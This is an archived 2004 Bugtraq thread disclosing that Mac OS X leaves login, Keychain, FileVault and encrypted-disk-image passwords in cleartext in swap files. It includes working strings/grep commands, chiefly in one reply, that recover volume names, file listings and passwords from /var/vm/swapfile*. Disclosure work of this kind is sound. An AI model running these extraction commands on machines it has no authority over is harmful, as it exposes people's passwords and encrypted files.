Bugtraq mailing list archives
Re: Mac OS X stores login/Keychain/FileVault passwords on disk
From: <johnny () ihackstuff com>
Date: 16 Jul 2004 14:51:35 -0000
The issue of getting into AES128 encrypted disk images is easy to unravel with this swapfile problem. We'll start by grabbing the volume name of an AES128 encrypted disk image file. Assuming the image name is test1.dmg, try: root# strings -8 /var/vm/swapfile* | grep -B1 test1.dmg | grep Volumes /Volumes/SECRET Armed with the volume name, we can grab the file listing of that (supposedly protected) AES128 encrypted disk image. Since our volume name is 'SECRET'. Try: root# strings -8 /var/vm/swapfile* | grep "<string>/Volumes/SECRET" <string>/Volumes/SECRET/secretporn.pdf</string> <string>/Volumes/SECRET/secretphoto.jpg</string> <string>/Volumes/SECRET/badmovie.mpg</string> <string>/Volumes/SECRET/horriblybadmovie.mpg</string> <string>/Volumes/SECRET/naughty.mpg</string> <string>/Volumes/SECRET</string> To REALLY get at those (supposedly protected) files, we could use the password. It's easy to grab it even if it's not in the keychain: root# strings -8 /var/vm/swapfile* | grep -B1 "/System/Library/ CoreServices/DiskImageMounter.app" [... snip ... ] -- mySecretPasswordTest /System/Library/CoreServices/DiskImageMounter.app [... snip ... ] The only chore may be figuring out which password goes with which disk image. And that's not nearly the chore of popping AES128 encryption... j0hnny http://johnny.ihackstuff.com johnny () ihackstuff com ------------------------------------- From: Adi Kriegisch <adi () cg tuwien ac at> To: bugtraq () securityfocus com Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on disk Sent: Monday, July 12, 2004 9:05 AM The swapfiles are deleted on startup -- this means even a clean shutdown by user leaves the passwords on disk. So if you loose your powerbook someone might boot it in "target disk mode" and will be able to get your password! Adi === It seems that Mac OS X (10.3.4 tested) doesn't bother clearing memory containing sensitive data, or using mlock() to avoid swapping. A quick grep of the swapfiles will show up various morsels: rez:~> sudo strings -8 /var/vm/swapfile0 |grep -A 4 -i longname longname password <user's password here> /bin/zsh username --- ... various other occurrences follow Grepping for context around "password" also shows up results, and grepping for portions of a Keychain password (differing from the login password) will also get results. It appears that loginwindow is one of the apps involved, I haven't investigated what else is involved. The amount of memory and usage patterns of the machine will affect what gets swapped, though loginwindow seems likely to get swapped early since it is seldom used after login. Obviously this is only of interest if an attacker has root (or physical) access to a machine, however it does make FileVault or Keychain encryption fairly useless. It appears that the swapfiles are removed on shutdown or startup, though not wiped - pulling the power from a sleeping machine, and/or booting from CD, would quite easily retrieve the password(s). Reported to Apple on 21 June, I haven't had any response. It'd be nice if they at least said "we're taking a look if it's an issue". Matt
Current thread:
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk Adi Kriegisch (Jul 15)
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk Theo Van Dinter (Jul 17)
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk Adi Kriegisch (Jul 24)
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk Ray Slakinski (Jul 17)
- <Possible follow-ups>
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk johnny (Jul 17)
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk Kurt Seifried (Jul 18)
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk Chris Boyd (Jul 19)
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk James Goodlet (Jul 19)
- RE: Mac OS X stores login/Keychain/FileVault passwords on disk Michael Shirk (Jul 19)
- Re: Mac OS X stores login/Keychain/FileVault passwords on disk Theo Van Dinter (Jul 17)